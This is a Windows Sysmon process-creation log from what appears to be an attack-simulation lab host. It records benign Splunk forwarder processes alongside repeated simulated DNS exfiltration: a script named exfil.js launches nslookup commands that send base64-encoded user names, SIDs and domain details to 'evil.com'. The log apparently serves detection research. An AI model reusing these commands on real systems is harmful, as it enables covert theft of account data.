154100x800000000000000075522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:34:10.532{A8622C2F-5CF2-6078-CD0F-00000000AE01}5424C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CF2-6078-CB0F-00000000AE01}5516C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbfcqrg.tmp 2>&1 154100x800000000000000075511Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:34:10.502{A8622C2F-5CF2-6078-CB0F-00000000AE01}5516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbfcqrg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000075440Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:52.899{A8622C2F-5CE0-6078-CA0F-00000000AE01}6460C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CE0-6078-C80F-00000000AE01}3912C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfnlh.tmp 2>&1 154100x800000000000000075429Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:52.870{A8622C2F-5CE0-6078-C80F-00000000AE01}3912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfnlh.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000075379Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:40.448{A8622C2F-5CD4-6078-C70F-00000000AE01}828C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CD4-6078-C50F-00000000AE01}5988C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluss.tmp 2>&1 154100x800000000000000075368Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:40.418{A8622C2F-5CD4-6078-C50F-00000000AE01}5988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluss.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000075304Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:25.383{A8622C2F-5CC5-6078-C40F-00000000AE01}4772C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CC5-6078-C20F-00000000AE01}6460C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgjgav.tmp 2>&1 154100x800000000000000075293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:25.353{A8622C2F-5CC5-6078-C20F-00000000AE01}6460C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgjgav.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000075272Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:22.824{A8622C2F-5CC2-6078-C10F-00000000AE01}5800C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CC2-6078-BF0F-00000000AE01}6464C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrgddvi.tmp 2>&1 154100x800000000000000075261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:22.795{A8622C2F-5CC2-6078-BF0F-00000000AE01}6464C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrgddvi.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000075250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:21.979{A8622C2F-5CC1-6078-BE0F-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:20.660{A8622C2F-5CC0-6078-BD0F-00000000AE01}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:19.991{A8622C2F-5CBF-6078-BC0F-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:19.325{A8622C2F-5CBF-6078-BB0F-00000000AE01}4856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075194Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:17.546{A8622C2F-5CBD-6078-BA0F-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:16.879{A8622C2F-5CBC-6078-B90F-00000000AE01}5216C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:16.259{A8622C2F-5CBC-6078-B80F-00000000AE01}5860C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000075140Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:07.754{A8622C2F-5CB3-6078-B70F-00000000AE01}5108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CB3-6078-B50F-00000000AE01}6696C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlorio.tmp 2>&1 154100x800000000000000075128Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:33:07.725{A8622C2F-5CB3-6078-B50F-00000000AE01}6696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlorio.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000075073Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:55.298{A8622C2F-5CA7-6078-B40F-00000000AE01}5392C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5CA7-6078-B20F-00000000AE01}4268C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsixgp.tmp 2>&1 154100x800000000000000075062Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:55.269{A8622C2F-5CA7-6078-B20F-00000000AE01}4268C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsixgp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074942Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:37.674{A8622C2F-5C95-6078-B10F-00000000AE01}6128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C95-6078-AF0F-00000000AE01}4408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloiw.tmp 2>&1 154100x800000000000000074931Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:37.644{A8622C2F-5C95-6078-AF0F-00000000AE01}4408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nloiw.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074846Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:25.207{A8622C2F-5C89-6078-AE0F-00000000AE01}5108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C89-6078-AC0F-00000000AE01}4420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzogs.tmp 2>&1 154100x800000000000000074835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:25.178{A8622C2F-5C89-6078-AC0F-00000000AE01}4420C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzogs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:22.010{A8622C2F-5C86-6078-AB0F-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074799Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:20.488{A8622C2F-5C84-6078-AA0F-00000000AE01}2196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074790Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:19.835{A8622C2F-5C83-6078-A90F-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074778Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:19.308{A8622C2F-5C83-6078-A80F-00000000AE01}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074765Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:17.569{A8622C2F-5C81-6078-A70F-00000000AE01}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 